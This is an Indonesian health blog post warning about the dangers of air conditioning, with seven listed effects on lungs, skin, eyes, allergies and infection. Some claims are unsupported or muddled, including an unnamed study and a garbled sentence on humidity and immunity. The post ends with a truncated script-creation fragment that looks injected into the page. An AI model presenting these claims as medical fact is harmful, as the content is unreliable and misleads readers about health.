Bahaya Penggunaan AC Untuk Kesehatan

AC sangat banyak diminati dan digunakan dalam aktivitas sepanjang hari. Sampai saat ini penggunaan AC sudah tersebar luas di kantor-kantor, supermartket, rumah makan, hingga kampus dan sekolah-sekolah. Memang sangat nyaman berada di sana. Begitu terasa menyejukan bebas dari hawa panas terik matahari. Namun tahukah anda, terlalu lama di ruangan ber-AC ternyata tidak menyehatkan. Nah, kali ini kami akan membahas tentang Bahaya penggunaan AC untuk kesehatan. 

ac

Sebuah penelitian membuktikan bahwa ketika kita ada di ruangan terbuka atau di luar ruangan, sistem kekebalan tubuh dapat bekerja dengan baik. Ketika berada di ruangan terbuka, sel-sel darah putih akan bekerja lebih efektif dan mendapat asupan oksigen yang cukup. Berbeda dengan kita berada di ruangan Ber-AC. Kesehatan bisa terganggu.

AC menyebabkan pendinginan melalui proses penguapan sehingga bisa mengeringkan selaput lendir di hidung dan juga mulut.Padahal sinus, hidung dan tenggorokan butuh kelembaban untuk dapat memperkuat sistem kekebalan tubuh. Penyakit infeksi pernapasan seperti flu dan pilek pun menjadi hal yang paling banyak terjadi akibat berlama-lama di ruangan ber-AC. Selain itu tenggorokan gatal serta sakit kepala juga kadang muncul akibat lama di ruangan AC.

Kondisi lembab dapat menarik virus, bakteri dan alergen ke dalam perangkap sehingga dapat memperkuat sistem kekebalan tubuh. Sayang, sistem pendinginan AC kebanyakan tidak menggunakan humidifier jadi malah menghasilkan udara kering. Ini yang kemudian memperlemah sistem kekebalan tubuh.

Kita tentu tidak menyangkal, cuaca maupun hawa di bumi yang kita  tempati semakin panas saja. Oleh karena itulah, tak mengherankan, banyak diantara kita yang memakai AC untuk menyejukkan suhu di rumah, kantor, tempat perbelanjaan atau tempat tertutup lainnya. Udara sejuk merupakan salah satu keuntungan yang didapatkan dengan terpasangnya AC tersebut. Meskipun begitu, ada beberapa dampak buruk penggunaan AC bagi kesehatan tubuh seseorang. Inilah beberapa dampak dari penggunaan AC:

1. Menurunnya Kesehatan Paru-Paru Anda.

Ini dikarenakan, ruangan ber-AC dapat menyebabkan suhu dan kelembaban di dalam ruangan berubah secara mendadak. Kedua perubahaa tersebut akan berpengaruh pada sistem pernafasan seseorang khususnya paru-parunya.

2. Berdampak Buruk Untuk Kesehatan Kulit Anda.

Tekstur kulit yang semakin kering dan berkurangnya selaput lendir pada kulit merupakan beberapa efek buruk saat berada di ruangan ber-AC terlalu lama.

3. Salah Satu Penyebab Sakit Kepala Atau Pusing

Ini dikarenakan, ada beberapa model AC yang mengeluarkan bunyi yang cukup keras yang dapat membuat rasa pusing di kepala anda.

4. Penularan virus

Mudahnya Virus, Kuman Maupun Bakteri Berpindah Dari Satu Orang Ke Orang Di Sekitarnya. Ini dikarenakan, ruangan yang selalu terturup dan minimnya sirkulasi udara dalam ruangan ber-AC. Sehingga jika ada seseorang yang sakit, maka akan mudah sekali menularkannya pada orang lain didalam satu ruangan yang sama.

5. Bertanggung Jawab Atas Beberapa Alergi Yang Sering Di Alami.

Sirkulasi udara yang buruk diruangan yang ber-AC akan menyebabkan keluhan berbagai alergi. Karena debu yang terperangkap dan kualitas udara yang buruk di dalam ruangan ber-AC tersebut.

6. Resiko Penyakit Mata Yang Meningkat.

Dua penyakit mata yaitu konjungtivitis serta blepharitis akan beresiko dialami oleh seseorang yang menghabiskan sebagian besar waktu hariannya berada di ruangan yang ber-AC.

7. Tidak Tahan Suhu Panas Dan Mudah Lelah.

Bagi mereka yang terbiasa bekerja dan beraktivitas diruangan yang ber-AC, maka begitu keluar ruangan merasa tidak nyaman dan selalu mengeluarkan keringat. Gejala lainnya yaitu mereka mudah lelah saat beraktivitas dan bekerja yang ruangannya memiliki fasilitas AC.

@evoucher.co.id

 var d=document;var s=d.createElement(‘script’);